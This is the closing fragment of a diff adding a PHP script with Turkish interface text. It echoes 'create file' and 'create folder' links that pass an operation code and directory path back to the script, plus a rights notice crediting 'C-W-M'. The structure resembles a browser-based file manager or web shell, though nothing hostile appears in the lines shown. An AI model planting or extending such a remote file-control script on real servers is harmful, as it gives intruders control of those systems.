+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluþtur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluþtur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center>Tüm haklarý sahibi 	C-W-M'ye aittir</center><br>";
+?>
+
+
+
+